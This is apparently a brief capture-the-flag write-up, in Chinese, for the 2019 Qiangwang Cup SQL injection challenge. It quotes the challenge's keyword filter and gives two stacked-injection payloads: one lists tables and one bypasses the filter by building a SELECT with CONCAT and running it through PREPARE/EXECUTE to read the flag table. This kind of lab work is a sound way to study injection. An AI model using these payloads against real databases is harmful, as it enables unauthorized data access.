[强网杯 2019]随便注
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);strstr($inject, "set") && strstr($inject, "prepare")<!-- 获取表名 -->
/?inject=2';show tables;%23
<!-- get flag -->
';Set @sql = CONCAT('se','lect * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;#最后更新于